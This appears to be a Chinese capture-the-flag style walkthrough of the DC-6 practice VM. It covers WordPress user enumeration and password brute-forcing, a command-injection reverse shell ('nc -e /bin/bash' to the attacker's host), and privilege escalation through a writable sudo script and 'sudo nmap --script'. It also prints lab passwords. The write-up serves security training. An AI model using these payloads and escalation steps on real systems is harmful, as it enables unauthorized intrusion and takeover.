DC-6 靶机

DC_6

信息搜集

存活检测

详细扫描

需要添加 DNS 解析

bash 复制代码
vim /etc/hosts

后台网页扫描

bash 复制代码
dirsearch -u http://10.4.7.150

网页信息搜集

  • 使用 wappalyzer 插件识别 cms 指纹,发现为熟悉的 WordPress

  • 并且发现了网站的登陆页面

  • 直接上 wpscan

    扫描用户

    bash 复制代码
    wpscan --url http://wordy --enumerate u 

    扫描出如下用户,将用户写入 users 文件中以供爆破

  • 尝试 cewl 生成密码字典

  • 爆破

  • 爆破失败

  • rockyou 字典爆破

    dc6 官网上提示过滤一些密码可以提升爆破速度

    bash 复制代码
    cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
    bash 复制代码
    wpscan --url http://wordy --passwords passwords.txt --usernames users
  • 成功爆破

    用户名 mark

    密码 helpdesk01

  • 登录网页

Webshell

  • 搜索框内尝试命令注入

  • kali 开启 nc 监听

  • 输入连接反弹 shell 的命令

    bash 复制代码
    10.1.1.1|nc -e /bin/bash 10.4.7.146 7777

    有长度限制

  • 修改源码中允许的最大长度

    输入反弹命令,点击 Lookup 连接

  • 成功反弹

ssh登录

  • 反弹成功后搜集系统中有用信息

    在 /hoomr/mark/stuff 下发现了包含 graham 密码的文件

    密码为 GSo7isUM1D4

    尝试 ssh 登录

  • 成功登录

提权

  • sudo -l 查看权限

  • 发现 jens 可以无需密码以 root 权限运行 /home/jens/backups.sh

  • 查看 backup.sh 文件

    发现是一个压缩命令

  • 查看文件权限

    所属组拥有全部权限

  • 查看 graham 信息

    发现与 jens 同属一个组,拥有对文件的修改权限

  • 向文件中写入提权命令

    bash 复制代码
    echo bash >> backups.sh
  • sudo 执行

    bash 复制代码
    sudo -u jens /home/jens/backups.sh
  • 切换到 jens 用户

  • sudo -l 查看 root 权限

  • nmap 提权

    bash 复制代码
    TF=$(mktemp)
    echo 'os.execute("/bin/sh")' > $TF
    sudo nmap --script=$TF
  • 提权成功

总结

  • 命令注入,绕过
  • wpscan 用户扫描,密码爆破
  • nmap 提权
相关推荐
vortex516 分钟前
信息收集系列(六):路径爬取与目录爆破
网络安全·渗透·信息收集
blessing。。18 分钟前
I2C学习
linux·单片机·嵌入式硬件·嵌入式
2202_7544215433 分钟前
生成MPSOC以及ZYNQ的启动文件BOOT.BIN的小软件
java·linux·开发语言
.Ayang44 分钟前
tomcat 后台部署 war 包 getshell
java·计算机网络·安全·web安全·网络安全·tomcat·网络攻击模型
ZZZCY20031 小时前
华为ENSP--IP编址及静态路由配置
网络·华为
Hacker_Oldv1 小时前
开放性实验——网络安全渗透测试
安全·web安全
EasyCVR1 小时前
私有化部署视频平台EasyCVR宇视设备视频平台如何构建视频联网平台及升级视频转码业务?
大数据·网络·音视频·h.265
运维&陈同学1 小时前
【zookeeper03】消息队列与微服务之zookeeper集群部署
linux·微服务·zookeeper·云原生·消息队列·云计算·java-zookeeper
星竹1 小时前
upload-labs-master第12关详细教程
网络安全
hgdlip1 小时前
主IP地址与从IP地址:深入解析与应用探讨
网络·网络协议·tcp/ip